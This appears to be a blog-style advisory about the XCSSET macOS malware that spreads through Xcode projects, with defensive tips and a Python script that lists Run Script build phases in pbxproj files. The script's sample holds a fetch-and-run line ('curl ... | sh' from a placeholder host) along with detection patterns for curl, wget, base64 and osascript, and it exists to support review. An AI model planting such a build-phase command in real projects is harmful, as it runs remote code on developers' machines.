I wanted to share this news with you if you use Xcode on a Mac. Microsoft reported a new type of malware, XCSSET, that targets developers.
What is XCSSET?
XCSSET is malware (bad software) that can:
- Steal data like browser history, saved passwords, and even crypto wallets.
- Spread via Xcode projects. If you receive an infected project and open/build it, the malware executes right away.
What has changed in this version?
The latest version is significantly more dangerous. Here are the changes:
• Firefox attack: It now targets Firefox using a tool called HackBrowserData. This means it can read the data you have stored in Firefox and take it.
• Crypto theft: It now watches your clipboard. If you copy a transfer address for a crypto transaction, the malware could swap it out with the hacker's address, so instead of going to the recipient, your funds go to the hacker's address.
• Better camouflage: The latest version creates fake files and applications, such as a fake "System Settings" application, so you are not aware that the malware is operating in the background.
• Stays on your Mac: It creates hidden tasks that run even when you reboot.
How worried should you be?
Microsoft says it's not yet spreading globally, though that could change quickly -- better safe than sorry!
Here’s how you can protect yourself:
- Continuously upgrade macOS and Xcode. It’s common for these types of updates to fix major security holes.
- Make sure to review projects before you build them. If you are seeing something odd in a project, like strange files or scripts that you did not create, take caution.
- Be wary of using shared repos or code from someone unknown to you.
- Monitor your Mac for unusual activity. If you see apps, daemons or other processes you have never seen before, or high CPU usage without any reason, that could be a sign that something is amiss.
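One way to act on the advice to review a project before building it, as an added example that is not part of the original post or of Microsoft's report: this Python script lists every Run Script build phase in a `project.pbxproj` so you can spot scripts you did not create. The sample project, the placeholder URL and the hint patterns are constructed for illustration; the hints are generic review cues, not XCSSET signatures.

```python
import re
import sys
from pathlib import Path

# Matches one object: ID /* comment */ = { isa = PBXShellScriptBuildPhase; ...fields... };
PHASE_RE = re.compile(
    r'(\w+)\s*(?:/\*[^*]*\*/)?\s*=\s*\{\s*isa\s*=\s*PBXShellScriptBuildPhase;(.*?)\n\s*\};', re.S)
# Generic review hints (assumption: not XCSSET signatures, just things worth reading closely).
HINTS = {"downloads from the network": r'\b(curl|wget)\b', "decodes base64": r'\bbase64\b',
         "runs AppleScript": r'\bosascript\b', "pipes into a shell": r'\|\s*(ba|z)?sh\b'}

def field(body, key):
    # Return a field's value; pbxproj values are either "quoted with escapes" or bare.
    m = re.search(r'\b%s\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;\s]+))\s*;' % key, body, re.S)
    if m and m.group(1) is not None:
        return re.sub(r'\\(.)', lambda e: {"n": "\n", "t": "\t"}.get(e.group(1), e.group(1)), m.group(1))
    return m.group(2) if m else None

def script_phases(pbxproj_text):
    """List every Run Script build phase with its decoded script and any review hints."""
    phases = []
    for obj_id, body in PHASE_RE.findall(pbxproj_text):
        script = field(body, "shellScript") or ""
        hints = [label for label, pat in HINTS.items() if re.search(pat, script)]
        phases.append({"id": obj_id, "name": field(body, "name") or "(unnamed)",
                       "shell": field(body, "shellPath"), "script": script, "hints": hints})
    return phases

# Constructed sample in the pbxproj layout; object IDs and the URL are placeholders.
SAMPLE = r'''
		AA0000000000000000000001 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			name = SwiftLint;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
		};
		AA0000000000000000000002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s \"https://example.invalid/a\" | sh\n";
		};
'''

if __name__ == "__main__":  # usage: script.py [directory]; with no argument it scans SAMPLE
    found = Path(sys.argv[1]).rglob("project.pbxproj") if len(sys.argv) > 1 else None
    for text in [SAMPLE] if found is None else [p.read_text(errors="replace") for p in found]:
        for ph in script_phases(text):
            print(f"{ph['id']} {ph['name']} [{ph['shell']}] hints={ph['hints']}\n{ph['script']}")
```

Run it against a freshly cloned repository before opening it in Xcode; an empty hint list does not clear a script, so read every phase the tool prints.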